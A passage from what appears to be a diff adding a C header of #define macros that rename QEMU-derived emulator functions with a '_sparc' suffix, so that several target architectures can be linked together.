ldst_name ldst_name_sparc +#define ldub_p ldub_p_sparc +#define ldub_phys ldub_phys_sparc +#define lduw_be_p lduw_be_p_sparc +#define lduw_be_phys lduw_be_phys_sparc +#define lduw_he_p lduw_he_p_sparc +#define lduw_le_p lduw_le_p_sparc +#define lduw_le_phys lduw_le_phys_sparc +#define lduw_phys lduw_phys_sparc +#define lduw_phys_internal lduw_phys_internal_sparc +#define le128 le128_sparc +#define linked_bp_matches linked_bp_matches_sparc +#define listener_add_address_space listener_add_address_space_sparc +#define load_cpu_offset load_cpu_offset_sparc +#define load_reg load_reg_sparc +#define load_reg_var load_reg_var_sparc +#define log_cpu_state log_cpu_state_sparc +#define lpae_cp_reginfo lpae_cp_reginfo_sparc +#define lt128 lt128_sparc +#define machine_class_init machine_class_init_sparc +#define machine_finalize machine_finalize_sparc +#define machine_info machine_info_sparc +#define machine_initfn machine_initfn_sparc +#define machine_register_types machine_register_types_sparc +#define machvirt_init machvirt_init_sparc +#define machvirt_machine_init machvirt_machine_init_sparc +#define maj maj_sparc +#define mapping_conflict mapping_conflict_sparc +#define mapping_contiguous mapping_contiguous_sparc +#define mapping_have_same_region mapping_have_same_region_sparc +#define mapping_merge mapping_merge_sparc +#define mem_add mem_add_sparc +#define mem_begin mem_begin_sparc +#define mem_commit mem_commit_sparc +#define memory_access_is_direct memory_access_is_direct_sparc +#define memory_access_size memory_access_size_sparc +#define memory_init memory_init_sparc +#define memory_listener_match memory_listener_match_sparc +#define memory_listener_register memory_listener_register_sparc +#define memory_listener_unregister memory_listener_unregister_sparc +#define memory_map_init memory_map_init_sparc +#define memory_mapping_filter memory_mapping_filter_sparc +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_sparc +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_sparc +#define memory_mapping_list_free memory_mapping_list_free_sparc +#define memory_mapping_list_init memory_mapping_list_init_sparc +#define memory_region_access_valid memory_region_access_valid_sparc +#define memory_region_add_subregion memory_region_add_subregion_sparc +#define memory_region_add_subregion_common memory_region_add_subregion_common_sparc +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_sparc +#define memory_region_big_endian memory_region_big_endian_sparc +#define memory_region_clear_pending memory_region_clear_pending_sparc +#define memory_region_del_subregion memory_region_del_subregion_sparc +#define memory_region_destructor_alias memory_region_destructor_alias_sparc +#define memory_region_destructor_none memory_region_destructor_none_sparc +#define memory_region_destructor_ram memory_region_destructor_ram_sparc +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_sparc +#define memory_region_dispatch_read memory_region_dispatch_read_sparc +#define memory_region_dispatch_read1 memory_region_dispatch_read1_sparc +#define memory_region_dispatch_write memory_region_dispatch_write_sparc +#define memory_region_escape_name memory_region_escape_name_sparc +#define memory_region_finalize memory_region_finalize_sparc +#define memory_region_find memory_region_find_sparc +#define memory_region_get_addr memory_region_get_addr_sparc +#define memory_region_get_alignment memory_region_get_alignment_sparc +#define memory_region_get_container memory_region_get_container_sparc +#define memory_region_get_fd memory_region_get_fd_sparc +#define memory_region_get_may_overlap memory_region_get_may_overlap_sparc +#define memory_region_get_priority memory_region_get_priority_sparc +#define memory_region_get_ram_addr memory_region_get_ram_addr_sparc +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_sparc +#define memory_region_get_size memory_region_get_size_sparc +#define memory_region_info memory_region_info_sparc +#define memory_region_init memory_region_init_sparc +#define memory_region_init_alias memory_region_init_alias_sparc +#define memory_region_initfn memory_region_initfn_sparc +#define memory_region_init_io memory_region_init_io_sparc +#define memory_region_init_ram memory_region_init_ram_sparc +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_sparc +#define memory_region_init_reservation memory_region_init_reservation_sparc +#define memory_region_is_iommu memory_region_is_iommu_sparc +#define memory_region_is_logging memory_region_is_logging_sparc +#define memory_region_is_mapped memory_region_is_mapped_sparc +#define memory_region_is_ram memory_region_is_ram_sparc +#define memory_region_is_rom memory_region_is_rom_sparc +#define memory_region_is_romd memory_region_is_romd_sparc +#define memory_region_is_skip_dump memory_region_is_skip_dump_sparc +#define memory_region_is_unassigned memory_region_is_unassigned_sparc +#define memory_region_name memory_region_name_sparc +#define memory_region_need_escape memory_region_need_escape_sparc +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_sparc +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_sparc +#define memory_region_present memory_region_present_sparc +#define memory_region_read_accessor memory_region_read_accessor_sparc +#define memory_region_readd_subregion memory_region_readd_subregion_sparc +#define memory_region_ref memory_region_ref_sparc +#define memory_region_resolve_container memory_region_resolve_container_sparc +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_sparc +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_sparc +#define memory_region_set_address memory_region_set_address_sparc +#define memory_region_set_alias_offset memory_region_set_alias_offset_sparc +#define memory_region_set_enabled memory_region_set_enabled_sparc +#define memory_region_set_readonly memory_region_set_readonly_sparc +#define memory_region_set_skip_dump memory_region_set_skip_dump_sparc +#define memory_region_size memory_region_size_sparc +#define memory_region_to_address_space memory_region_to_address_space_sparc +#define memory_region_transaction_begin memory_region_transaction_begin_sparc +#define memory_region_transaction_commit memory_region_transaction_commit_sparc +#define memory_region_unref memory_region_unref_sparc +#define memory_region_update_container_subregions memory_region_update_container_subregions_sparc +#define memory_region_write_accessor memory_region_write_accessor_sparc +#define memory_region_wrong_endianness memory_region_wrong_endianness_sparc +#define memory_try_enable_merging memory_try_enable_merging_sparc +#define module_call_init module_call_init_sparc +#define module_load module_load_sparc +#define mpidr_cp_reginfo mpidr_cp_reginfo_sparc +#define mpidr_read mpidr_read_sparc +#define msr_mask msr_mask_sparc +#define mul128By64To192 mul128By64To192_sparc +#define mul128To256 mul128To256_sparc +#define mul64To128 mul64To128_sparc +#define muldiv64 muldiv64_sparc +#define neon_2rm_is_float_op neon_2rm_is_float_op_sparc +#define neon_2rm_sizes neon_2rm_sizes_sparc +#define neon_3r_sizes neon_3r_sizes_sparc +#define neon_get_scalar neon_get_scalar_sparc +#define neon_load_reg neon_load_reg_sparc +#define neon_load_reg64 neon_load_reg64_sparc +#define neon_load_scratch neon_load_scratch_sparc +#define neon_ls_element_type neon_ls_element_type_sparc +#define neon_reg_offset neon_reg_offset_sparc +#define neon_store_reg neon_store_reg_sparc +#define neon_store_reg64 neon_store_reg64_sparc +#define neon_store_scratch neon_store_scratch_sparc +#define new_ldst_label new_ldst_label_sparc +#define next_list next_list_sparc +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_sparc +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_sparc +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_sparc +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_sparc +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_sparc +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_sparc +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_sparc +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_sparc +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_sparc +#define not_v6_cp_reginfo not_v6_cp_reginfo_sparc +#define not_v7_cp_reginfo not_v7_cp_reginfo_sparc +#define not_v8_cp_reginfo not_v8_cp_reginfo_sparc +#define object_child_foreach object_child_foreach_sparc +#define object_class_foreach object_class_foreach_sparc +#define object_class_foreach_tramp object_class_foreach_tramp_sparc +#define object_class_get_list object_class_get_list_sparc +#define object_class_get_list_tramp object_class_get_list_tramp_sparc +#define object_class_get_parent object_class_get_parent_sparc +#define object_deinit object_deinit_sparc +#define object_dynamic_cast object_dynamic_cast_sparc +#define object_finalize object_finalize_sparc +#define object_finalize_child_property object_finalize_child_property_sparc +#define object_get_child_property object_get_child_property_sparc +#define object_get_link_property object_get_link_property_sparc +#define object_get_root object_get_root_sparc +#define object_initialize_with_type object_initialize_with_type_sparc +#define object_init_with_type object_init_with_type_sparc +#define object_instance_init object_instance_init_sparc +#define object_new_with_type object_new_with_type_sparc +#define object_post_init_with_type object_post_init_with_type_sparc +#define object_property_add_alias object_property_add_alias_sparc +#define object_property_add_link object_property_add_link_sparc +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_sparc +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_sparc +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_sparc +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_sparc +#define object_property_allow_set_link object_property_allow_set_link_sparc +#define object_property_del object_property_del_sparc +#define object_property_del_all object_property_del_all_sparc +#define object_property_find object_property_find_sparc +#define object_property_get object_property_get_sparc +#define object_property_get_bool object_property_get_bool_sparc +#define object_property_get_int object_property_get_int_sparc +#define object_property_get_link object_property_get_link_sparc +#define object_property_get_qobject object_property_get_qobject_sparc +#define object_property_get_str object_property_get_str_sparc +#define object_property_get_type object_property_get_type_sparc +#define object_property_is_child object_property_is_child_sparc +#define object_property_set object_property_set_sparc +#define object_property_set_description object_property_set_description_sparc +#define object_property_set_link object_property_set_link_sparc +#define object_property_set_qobject object_property_set_qobject_sparc +#define object_release_link_property object_release_link_property_sparc +#define object_resolve_abs_path object_resolve_abs_path_sparc +#define object_resolve_child_property object_resolve_child_property_sparc +#define object_resolve_link object_resolve_link_sparc +#define object_resolve_link_property object_resolve_link_property_sparc +#define object_resolve_partial_path object_resolve_partial_path_sparc +#define object_resolve_path object_resolve_path_sparc +#define object_resolve_path_component object_resolve_path_component_sparc +#define object_resolve_path_type object_resolve_path_type_sparc +#define object_set_link_property object_set_link_property_sparc +#define object_unparent object_unparent_sparc +#define omap_cachemaint_write omap_cachemaint_write_sparc +#define omap_cp_reginfo omap_cp_reginfo_sparc +#define omap_threadid_write omap_threadid_write_sparc +#define omap_ticonfig_write omap_ticonfig_write_sparc +#define omap_wfi_write omap_wfi_write_sparc +#define op_bits op_bits_sparc +#define open_modeflags open_modeflags_sparc +#define op_to_mov op_to_mov_sparc +#define op_to_movi op_to_movi_sparc +#define output_type_enum output_type_enum_sparc +#define packFloat128 packFloat128_sparc +#define packFloat16 packFloat16_sparc +#define packFloat32 packFloat32_sparc +#define packFloat64 packFloat64_sparc +#define packFloatx80 packFloatx80_sparc +#define page_find page_find_sparc +#define page_find_alloc page_find_alloc_sparc +#define page_flush_tb page_flush_tb_sparc +#define page_flush_tb_1 page_flush_tb_1_sparc +#define page_init page_init_sparc +#define page_size_init page_size_init_sparc +#define par par_sparc +#define parse_array parse_array_sparc +#define parse_error parse_error_sparc +#define parse_escape parse_escape_sparc +#define parse_keyword parse_keyword_sparc +#define parse_literal parse_literal_sparc +#define parse_object parse_object_sparc +#define parse_optional parse_optional_sparc +#define parse_option_bool parse_option_bool_sparc +#define parse_option_number parse_option_number_sparc +#define parse_option_size parse_option_size_sparc +#define parse_pair parse_pair_sparc +#define parser_context_free parser_context_free_sparc +#define parser_context_new parser_context_new_sparc +#define parser_context_peek_token parser_context_peek_token_sparc +#define parser_context_pop_token parser_context_pop_token_sparc +#define parser_context_restore parser_context_restore_sparc +#define parser_context_save parser_context_save_sparc +#define parse_str parse_str_sparc +#define parse_type_bool parse_type_bool_sparc +#define parse_type_int parse_type_int_sparc +#define parse_type_number parse_type_number_sparc +#define parse_type_size parse_type_size_sparc +#define parse_type_str parse_type_str_sparc +#define parse_value parse_value_sparc +#define par_write par_write_sparc +#define patch_reloc patch_reloc_sparc +#define phys_map_node_alloc phys_map_node_alloc_sparc +#define phys_map_node_reserve phys_map_node_reserve_sparc +#define phys_mem_alloc phys_mem_alloc_sparc +#define phys_mem_set_alloc phys_mem_set_alloc_sparc +#define phys_page_compact phys_page_compact_sparc +#define phys_page_compact_all phys_page_compact_all_sparc +#define phys_page_find phys_page_find_sparc +#define phys_page_set phys_page_set_sparc +#define phys_page_set_level phys_page_set_level_sparc +#define phys_section_add phys_section_add_sparc +#define phys_section_destroy phys_section_destroy_sparc +#define phys_sections_free phys_sections_free_sparc +#define pickNaN pickNaN_sparc +#define pickNaNMulAdd pickNaNMulAdd_sparc +#define pmccfiltr_write pmccfiltr_write_sparc +#define pmccntr_read pmccntr_read_sparc +#define pmccntr_sync pmccntr_sync_sparc +#define pmccntr_write pmccntr_write_sparc +#define pmccntr_write32 pmccntr_write32_sparc +#define pmcntenclr_write pmcntenclr_write_sparc +#define pmcntenset_write pmcntenset_write_sparc +#define pmcr_write pmcr_write_sparc +#define pmintenclr_write pmintenclr_write_sparc +#define pmintenset_write pmintenset_write_sparc +#define pmovsr_write pmovsr_write_sparc +#define pmreg_access pmreg_access_sparc +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_sparc +#define pmsav5_data_ap_read pmsav5_data_ap_read_sparc +#define pmsav5_data_ap_write pmsav5_data_ap_write_sparc +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_sparc +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_sparc +#define pmuserenr_write pmuserenr_write_sparc +#define pmxevtyper_write pmxevtyper_write_sparc +#define print_type_bool print_type_bool_sparc +#define print_type_int print_type_int_sparc +#define print_type_number print_type_number_sparc +#define print_type_size print_type_size_sparc +#define print_type_str print_type_str_sparc +#define propagateFloat128NaN propagateFloat128NaN_sparc +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_sparc +#define propagateFloat32NaN propagateFloat32NaN_sparc +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_sparc +#define propagateFloat64NaN propagateFloat64NaN_sparc +#define propagateFloatx80NaN propagateFloatx80NaN_sparc +#define property_get_alias property_get_alias_sparc +#define property_get_bool property_get_bool_sparc +#define property_get_str property_get_str_sparc +#define property_get_uint16_ptr property_get_uint16_ptr_sparc +#define property_get_uint32_ptr property_get_uint32_ptr_sparc +#define property_get_uint64_ptr property_get_uint64_ptr_sparc +#define property_get_uint8_ptr property_get_uint8_ptr_sparc +#define property_release_alias property_release_alias_sparc +#define property_release_bool property_release_bool_sparc +#define property_release_str property_release_str_sparc +#define property_resolve_alias property_resolve_alias_sparc +#define property_set_alias property_set_alias_sparc +#define property_set_bool property_set_bool_sparc +#define property_set_str property_set_str_sparc +#define pstate_read pstate_read_sparc +#define pstate_write pstate_write_sparc +#define pxa250_initfn pxa250_initfn_sparc +#define pxa255_initfn pxa255_initfn_sparc +#define pxa260_initfn pxa260_initfn_sparc +#define pxa261_initfn pxa261_initfn_sparc +#define pxa262_initfn pxa262_initfn_sparc +#define pxa270a0_initfn pxa270a0_initfn_sparc +#define pxa270a1_initfn pxa270a1_initfn_sparc +#define pxa270b0_initfn pxa270b0_initfn_sparc +#define pxa270b1_initfn pxa270b1_initfn_sparc +#define pxa270c0_initfn pxa270c0_initfn_sparc +#define pxa270c5_initfn pxa270c5_initfn_sparc +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_sparc +#define qapi_dealloc_end_list qapi_dealloc_end_list_sparc +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_sparc +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_sparc +#define qapi_dealloc_next_list qapi_dealloc_next_list_sparc +#define qapi_dealloc_pop qapi_dealloc_pop_sparc +#define qapi_dealloc_push qapi_dealloc_push_sparc +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_sparc +#define qapi_dealloc_start_list qapi_dealloc_start_list_sparc +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_sparc +#define qapi_dealloc_start_union qapi_dealloc_start_union_sparc +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_sparc +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_sparc +#define qapi_dealloc_type_int qapi_dealloc_type_int_sparc +#define qapi_dealloc_type_number qapi_dealloc_type_number_sparc +#define qapi_dealloc_type_size qapi_dealloc_type_size_sparc +#define qapi_dealloc_type_str qapi_dealloc_type_str_sparc +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_sparc +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_sparc +#define qapi_free_boolList qapi_free_boolList_sparc +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_sparc +#define qapi_free_int16List qapi_free_int16List_sparc +#define qapi_free_int32List qapi_free_int32List_sparc +#define qapi_free_int64List qapi_free_int64List_sparc +#define qapi_free_int8List qapi_free_int8List_sparc +#define qapi_free_intList qapi_free_intList_sparc +#define qapi_free_numberList qapi_free_numberList_sparc +#define qapi_free_strList qapi_free_strList_sparc +#define qapi_free_uint16List qapi_free_uint16List_sparc +#define qapi_free_uint32List qapi_free_uint32List_sparc +#define qapi_free_uint64List qapi_free_uint64List_sparc +#define qapi_free_uint8List qapi_free_uint8List_sparc +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_sparc +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_sparc +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_sparc +#define qbool_destroy_obj qbool_destroy_obj_sparc +#define qbool_from_int qbool_from_int_sparc +#define qbool_get_int qbool_get_int_sparc +#define qbool_type qbool_type_sparc +#define qbus_create qbus_create_sparc +#define qbus_create_inplace qbus_create_inplace_sparc +#define qbus_finalize qbus_finalize_sparc +#define qbus_initfn qbus_initfn_sparc +#define qbus_realize qbus_realize_sparc +#define qdev_create qdev_create_sparc +#define qdev_get_type qdev_get_type_sparc +#define qdev_register_types qdev_register_types_sparc +#define qdev_set_parent_bus qdev_set_parent_bus_sparc +#define qdev_try_create qdev_try_create_sparc +#define qdict_add_key qdict_add_key_sparc +#define qdict_array_split qdict_array_split_sparc +#define qdict_clone_shallow qdict_clone_shallow_sparc +#define qdict_del qdict_del_sparc +#define qdict_destroy_obj qdict_destroy_obj_sparc +#define qdict_entry_key qdict_entry_key_sparc +#define qdict_entry_value qdict_entry_value_sparc +#define qdict_extract_subqdict qdict_extract_subqdict_sparc +#define qdict_find qdict_find_sparc +#define qdict_first qdict_first_sparc +#define qdict_flatten qdict_flatten_sparc +#define qdict_flatten_qdict qdict_flatten_qdict_sparc +#define qdict_flatten_qlist qdict_flatten_qlist_sparc +#define qdict_get qdict_get_sparc +#define qdict_get_bool qdict_get_bool_sparc +#define qdict_get_double qdict_get_double_sparc +#define qdict_get_int qdict_get_int_sparc +#define qdict_get_obj qdict_get_obj_sparc +#define qdict_get_qdict qdict_get_qdict_sparc +#define qdict_get_qlist qdict_get_qlist_sparc +#define qdict_get_str qdict_get_str_sparc +#define qdict_get_try_bool qdict_get_try_bool_sparc +#define qdict_get_try_int qdict_get_try_int_sparc +#define qdict_get_try_str qdict_get_try_str_sparc +#define qdict_haskey qdict_haskey_sparc +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_sparc +#define qdict_iter qdict_iter_sparc +#define qdict_join qdict_join_sparc +#define qdict_new qdict_new_sparc +#define qdict_next qdict_next_sparc +#define qdict_next_entry qdict_next_entry_sparc +#define qdict_put_obj qdict_put_obj_sparc +#define qdict_size qdict_size_sparc +#define qdict_type qdict_type_sparc +#define qemu_clock_get_us qemu_clock_get_us_sparc +#define qemu_clock_ptr qemu_clock_ptr_sparc +#define qemu_clocks qemu_clocks_sparc +#define qemu_get_cpu qemu_get_cpu_sparc +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_sparc +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_sparc +#define qemu_get_ram_block qemu_get_ram_block_sparc +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_sparc +#define qemu_get_ram_fd qemu_get_ram_fd_sparc +#define qemu_get_ram_ptr qemu_get_ram_ptr_sparc +#define qemu_host_page_mask qemu_host_page_mask_sparc +#define qemu_host_page_size qemu_host_page_size_sparc +#define qemu_init_vcpu qemu_init_vcpu_sparc +#define qemu_ld_helpers qemu_ld_helpers_sparc +#define qemu_log_close qemu_log_close_sparc +#define qemu_log_enabled qemu_log_enabled_sparc +#define qemu_log_flush qemu_log_flush_sparc +#define qemu_loglevel_mask qemu_loglevel_mask_sparc +#define qemu_log_vprintf qemu_log_vprintf_sparc +#define qemu_oom_check qemu_oom_check_sparc +#define qemu_parse_fd qemu_parse_fd_sparc +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_sparc +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_sparc +#define qemu_ram_alloc qemu_ram_alloc_sparc +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_sparc +#define qemu_ram_foreach_block qemu_ram_foreach_block_sparc +#define qemu_ram_free qemu_ram_free_sparc +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_sparc +#define qemu_ram_ptr_length qemu_ram_ptr_length_sparc +#define qemu_ram_remap qemu_ram_remap_sparc +#define qemu_ram_setup_dump qemu_ram_setup_dump_sparc +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_sparc +#define qemu_real_host_page_size qemu_real_host_page_size_sparc +#define qemu_st_helpers qemu_st_helpers_sparc +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_sparc +#define qemu_try_memalign qemu_try_memalign_sparc +#define qentry_destroy qentry_destroy_sparc +#define qerror_human qerror_human_sparc +#define qerror_report qerror_report_sparc +#define qerror_report_err qerror_report_err_sparc +#define qfloat_destroy_obj qfloat_destroy_obj_sparc +#define qfloat_from_double qfloat_from_double_sparc +#define qfloat_get_double qfloat_get_double_sparc +#define qfloat_type qfloat_type_sparc +#define qint_destroy_obj qint_destroy_obj_sparc +#define qint_from_int qint_from_int_sparc +#define qint_get_int qint_get_int_sparc +#define qint_type qint_type_sparc +#define qlist_append_obj qlist_append_obj_sparc +#define qlist_copy qlist_copy_sparc +#define qlist_copy_elem qlist_copy_elem_sparc +#define qlist_destroy_obj qlist_destroy_obj_sparc +#define qlist_empty qlist_empty_sparc +#define qlist_entry_obj qlist_entry_obj_sparc +#define qlist_first qlist_first_sparc +#define qlist_iter qlist_iter_sparc +#define qlist_new qlist_new_sparc +#define qlist_next qlist_next_sparc +#define qlist_peek qlist_peek_sparc +#define qlist_pop qlist_pop_sparc +#define qlist_size qlist_size_sparc +#define qlist_size_iter qlist_size_iter_sparc +#define qlist_type qlist_type_sparc +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_sparc +#define qmp_input_end_list qmp_input_end_list_sparc +#define qmp_input_end_struct qmp_input_end_struct_sparc +#define qmp_input_get_next_type qmp_input_get_next_type_sparc +#define qmp_input_get_object qmp_input_get_object_sparc +#define qmp_input_get_visitor qmp_input_get_visitor_sparc +#define qmp_input_next_list qmp_input_next_list_sparc +#define qmp_input_optional qmp_input_optional_sparc +#define qmp_input_pop qmp_input_pop_sparc +#define qmp_input_push qmp_input_push_sparc +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_sparc +#define qmp_input_start_list qmp_input_start_list_sparc +#define qmp_input_start_struct qmp_input_start_struct_sparc +#define qmp_input_type_bool qmp_input_type_bool_sparc +#define qmp_input_type_int qmp_input_type_int_sparc +#define qmp_input_type_number qmp_input_type_number_sparc +#define qmp_input_type_str qmp_input_type_str_sparc +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_sparc +#define qmp_input_visitor_new qmp_input_visitor_new_sparc +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_sparc +#define qmp_output_add_obj qmp_output_add_obj_sparc +#define qmp_output_end_list qmp_output_end_list_sparc +#define qmp_output_end_struct qmp_output_end_struct_sparc +#define qmp_output_first qmp_output_first_sparc +#define qmp_output_get_qobject qmp_output_get_qobject_sparc +#define qmp_output_get_visitor qmp_output_get_visitor_sparc +#define qmp_output_last qmp_output_last_sparc +#define qmp_output_next_list qmp_output_next_list_sparc +#define qmp_output_pop qmp_output_pop_sparc +#define qmp_output_push_obj qmp_output_push_obj_sparc +#define qmp_output_start_list qmp_output_start_list_sparc +#define qmp_output_start_struct qmp_output_start_struct_sparc +#define qmp_output_type_bool qmp_output_type_bool_sparc +#define qmp_output_type_int qmp_output_type_int_sparc +#define qmp_output_type_number qmp_output_type_number_sparc +#define qmp_output_type_str qmp_output_type_str_sparc +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_sparc +#define qmp_output_visitor_new qmp_output_visitor_new_sparc +#define qobject_decref qobject_decref_sparc +#define qobject_to_qbool qobject_to_qbool_sparc +#define qobject_to_qdict qobject_to_qdict_sparc +#define qobject_to_qfloat qobject_to_qfloat_sparc +#define qobject_to_qint qobject_to_qint_sparc +#define qobject_to_qlist qobject_to_qlist_sparc +#define qobject_to_qstring qobject_to_qstring_sparc +#define qobject_type qobject_type_sparc +#define qstring_append qstring_append_sparc +#define qstring_append_chr qstring_append_chr_sparc +#define qstring_append_int qstring_append_int_sparc +#define qstring_destroy_obj qstring_destroy_obj_sparc +#define qstring_from_escaped_str qstring_from_escaped_str_sparc +#define qstring_from_str qstring_from_str_sparc +#define qstring_from_substr qstring_from_substr_sparc +#define qstring_get_length qstring_get_length_sparc +#define qstring_get_str qstring_get_str_sparc +#define qstring_new qstring_new_sparc +#define qstring_type qstring_type_sparc +#define ram_block_add ram_block_add_sparc +#define ram_size ram_size_sparc +#define range_compare range_compare_sparc +#define range_covers_byte range_covers_byte_sparc +#define range_get_last range_get_last_sparc +#define range_merge range_merge_sparc +#define ranges_can_merge ranges_can_merge_sparc +#define raw_read raw_read_sparc +#define raw_write raw_write_sparc +#define rcon rcon_sparc +#define read_raw_cp_reg read_raw_cp_reg_sparc +#define recip_estimate recip_estimate_sparc +#define recip_sqrt_estimate recip_sqrt_estimate_sparc +#define register_cp_regs_for_features register_cp_regs_for_features_sparc +#define register_multipage register_multipage_sparc +#define register_subpage register_subpage_sparc +#define register_tm_clones register_tm_clones_sparc +#define register_types_object register_types_object_sparc +#define regnames regnames_sparc +#define render_memory_region render_memory_region_sparc +#define reset_all_temps reset_all_temps_sparc +#define reset_temp reset_temp_sparc +#define rol32 rol32_sparc +#define rol64 rol64_sparc +#define ror32 ror32_sparc +#define ror64 ror64_sparc +#define roundAndPackFloat128 roundAndPackFloat128_sparc +#define roundAndPackFloat16 roundAndPackFloat16_sparc +#define roundAndPackFloat32 roundAndPackFloat32_sparc +#define roundAndPackFloat64 roundAndPackFloat64_sparc +#define roundAndPackFloatx80 roundAndPackFloatx80_sparc +#define roundAndPackInt32 roundAndPackInt32_sparc +#define roundAndPackInt64 roundAndPackInt64_sparc +#define roundAndPackUint64 roundAndPackUint64_sparc +#define round_to_inf round_to_inf_sparc +#define run_on_cpu run_on_cpu_sparc +#define s0 s0_sparc +#define S0 S0_sparc +#define s1 s1_sparc +#define S1 S1_sparc +#define sa1100_initfn sa1100_initfn_sparc +#define sa1110_initfn sa1110_initfn_sparc +#define save_globals save_globals_sparc +#define scr_write scr_write_sparc +#define sctlr_write sctlr_write_sparc +#define set_bit set_bit_sparc +#define set_bits set_bits_sparc +#define set_default_nan_mode set_default_nan_mode_sparc +#define set_feature set_feature_sparc +#define set_float_detect_tininess set_float_detect_tininess_sparc +#define set_float_exception_flags set_float_exception_flags_sparc +#define set_float_rounding_mode set_float_rounding_mode_sparc +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_sparc +#define set_flush_to_zero set_flush_to_zero_sparc +#define set_swi_errno set_swi_errno_sparc +#define sextract32 sextract32_sparc +#define sextract64 sextract64_sparc +#define shift128ExtraRightJamming shift128ExtraRightJamming_sparc +#define shift128Right shift128Right_sparc +#define shift128RightJamming shift128RightJamming_sparc +#define shift32RightJamming shift32RightJamming_sparc +#define shift64ExtraRightJamming shift64ExtraRightJamming_sparc +#define shift64RightJamming shift64RightJamming_sparc +#define shifter_out_im shifter_out_im_sparc +#define shortShift128Left shortShift128Left_sparc +#define shortShift192Left shortShift192Left_sparc +#define simple_mpu_ap_bits simple_mpu_ap_bits_sparc +#define size_code_gen_buffer size_code_gen_buffer_sparc +#define softmmu_lock_user softmmu_lock_user_sparc +#define softmmu_lock_user_string softmmu_lock_user_string_sparc +#define softmmu_tget32 softmmu_tget32_sparc +#define softmmu_tget8 softmmu_tget8_sparc +#define softmmu_tput32 softmmu_tput32_sparc +#define softmmu_unlock_user softmmu_unlock_user_sparc +#define sort_constraints sort_constraints_sparc +#define sp_el0_access sp_el0_access_sparc +#define spsel_read spsel_read_sparc +#define spsel_write spsel_write_sparc +#define start_list start_list_sparc +#define stb_p stb_p_sparc +#define stb_phys stb_phys_sparc +#define stl_be_p stl_be_p_sparc +#define stl_be_phys stl_be_phys_sparc +#define stl_he_p stl_he_p_sparc +#define stl_le_p stl_le_p_sparc +#define stl_le_phys stl_le_phys_sparc +#define stl_phys stl_phys_sparc +#define stl_phys_internal stl_phys_internal_sparc +#define stl_phys_notdirty stl_phys_notdirty_sparc +#define store_cpu_offset store_cpu_offset_sparc +#define store_reg store_reg_sparc +#define store_reg_bx store_reg_bx_sparc +#define store_reg_from_load store_reg_from_load_sparc +#define stq_be_p stq_be_p_sparc +#define stq_be_phys stq_be_phys_sparc +#define stq_he_p stq_he_p_sparc +#define stq_le_p stq_le_p_sparc +#define stq_le_phys stq_le_phys_sparc +#define stq_phys stq_phys_sparc +#define string_input_get_visitor string_input_get_visitor_sparc +#define string_input_visitor_cleanup string_input_visitor_cleanup_sparc +#define string_input_visitor_new string_input_visitor_new_sparc +#define strongarm_cp_reginfo strongarm_cp_reginfo_sparc +#define strstart strstart_sparc +#define strtosz strtosz_sparc +#define strtosz_suffix strtosz_suffix_sparc +#define stw_be_p stw_be_p_sparc +#define stw_be_phys stw_be_phys_sparc +#define stw_he_p stw_he_p_sparc +#define stw_le_p stw_le_p_sparc +#define stw_le_phys stw_le_phys_sparc +#define stw_phys stw_phys_sparc +#define stw_phys_internal stw_phys_internal_sparc 